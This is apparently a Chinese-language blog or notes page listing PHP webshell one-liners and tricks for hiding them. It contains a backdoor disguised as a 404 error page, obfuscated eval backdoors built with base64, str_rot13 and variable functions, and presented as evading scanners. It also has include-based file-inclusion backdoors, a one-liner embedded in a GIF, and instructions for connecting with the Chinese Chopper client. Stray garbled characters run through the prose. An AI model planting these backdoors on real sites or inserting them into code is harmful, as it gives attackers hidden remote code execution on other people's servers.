1九巡、 利用404頁(yè)面隱藏PHP小馬:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@eval($_POST[password]);
header('HTTP/1.1 404 Not Found');
?>
404頁(yè)面是網(wǎng)站常用的文件,一般建議好后很少有人會(huì)去對(duì)它進(jìn)行檢查修改冕广,這時(shí)我們可以利用這一點(diǎn)進(jìn)行隱藏后門。
2偿洁、無(wú)特征隱藏PHP一句話:復(fù)現(xiàn)不成功
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
?>
將$_POST['code']的內(nèi)容賦值給$_SESSION['theCode'],然后執(zhí)行$_SESSION['theCode']涕滋,亮點(diǎn)是沒(méi)有特征碼。用掃描工具來(lái)檢查代碼的話宾肺,是不會(huì)報(bào)警的溯饵,達(dá)到目的了锨用。
下面幾個(gè)變形的一句話PHP木馬
3丰刊、
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里寫 http://site/1.php?2=assert 密碼是1
4增拥、無(wú)法復(fù)現(xiàn)
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里寫http://site/2.php? =assert& =eval($_POST['pass']) 密碼是pass
5、
($b4dboy = $_POST['shell']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
# @eval($_POST['shell'])的變形
# str_rot13(‘riny’)即編碼后的eval跪者,完全避開(kāi)了關(guān)鍵字,又不失效果渣玲,讓人吐血!
6弟晚、
$filename=$_GET['shell_address'];
include ($filename);
//危險(xiǎn)的include函數(shù)逾苫,直接編譯任何文件為php格式運(yùn)行
和上面類似
include ($_GET[uid]);
//危險(xiǎn)的include函數(shù),直接編譯任何文件為php格式運(yùn)行铅搓,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
<?php assert($_POST[sb]);?> # 菜刀eval連接
程序代碼
<script language="php">@eval($_POST[sb])</script>
//繞過(guò)<?限制的一句話